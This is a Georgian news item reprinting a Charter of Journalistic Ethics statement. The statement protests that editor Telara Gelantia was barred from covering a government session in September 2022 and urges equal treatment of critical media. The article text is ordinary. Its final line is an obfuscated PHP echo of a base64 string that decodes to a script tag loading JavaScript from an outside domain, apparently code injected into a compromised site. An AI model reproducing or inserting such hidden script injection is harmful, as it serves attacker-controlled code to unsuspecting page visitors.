celsiusi
ავერსი შნაიდერი
საქართველოს ჟურნალისტური ეთიკის ქარტია BMG TV-ის ჟურნალისტისა და ვებგვერდ BM.GE-ს მთავარი რედაქტორის თელარა გელანტიას მთავრობის ადმინისტრაციაში არშეშვებასთან დაკავშირებით განცხადებას ავრცელებს.
 
საინფორმაციო სააგენტო BUSINESS TIME ქარტიის განცხადებას უცვლელად გთავაზობთ:
 
„2022 წლის 12 სექტემბერს მედიასაშუალება BMG-ის მთავარმა რედაქტორმა, თელარა გელანტიამ გაავრცელა ინფორმაცია, რომ საქართველოს მთავრობის სხდომის გასაშუქებლად ადმინისტრაციის შენობაში შესვლა აუკრძალეს. თელარა გელანტიას თქმით, ადმინისტრაციის პრესასა და საზოგადოებასთან ურთიერთობის სამსახურის წარმომადგენელმა მიზეზად მისი მხრიდან „ბევრი შეკითხვის დასმა და კოლეგების შეწუხება” დაასახელა. ჟურნალისტის ვარაუდით, მთავრობის ადმინისტრაცია გააღიზიანა 9 სექტემბერს ეთერში გასულმა მისმა რეპორტაჟმა, რომელიც მთავრობის განკარგულებებს ეხებოდა.
 
ქარტიის საბჭოს აცხადებს, რომ საჯარო უწყების მხრიდან მსგავსი ქმედება დაუშვებელია და ამძიმებს ჟურნალისტების მიმართ არსებულ მტრულ გარემოს.
 
ჟურნალისტური ეთიკის ქარტიას მიიჩნია, რომ მედიის მიმართ არათანაბარი მიდგომა დაუშვებელი და დისკრიმინაციულია. მედიის როლი დემოკრატიული საზოგადოების განვითარებაში შეუცვლელია, ამიტომაც მნიშვნელოვანია, რომ ყველა მედიასაშუალების წარმომადგენელი თანაბარ პირობებში იყოს.
 
მოვუწოდებთ საქართველოს მთავრობას, არ ჩააყენონ დისკრიმინაციულ მდგომარეობაში კრიტიკული მედიის წარმომადგენლები და შეუქმნან სათანადო სამუშაო პირობები“, - ნათქვამია ჟურნალისტური ეთიკის ქარტიის მიერ გავრცელებულ განცხადებაში.
 
 
704
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");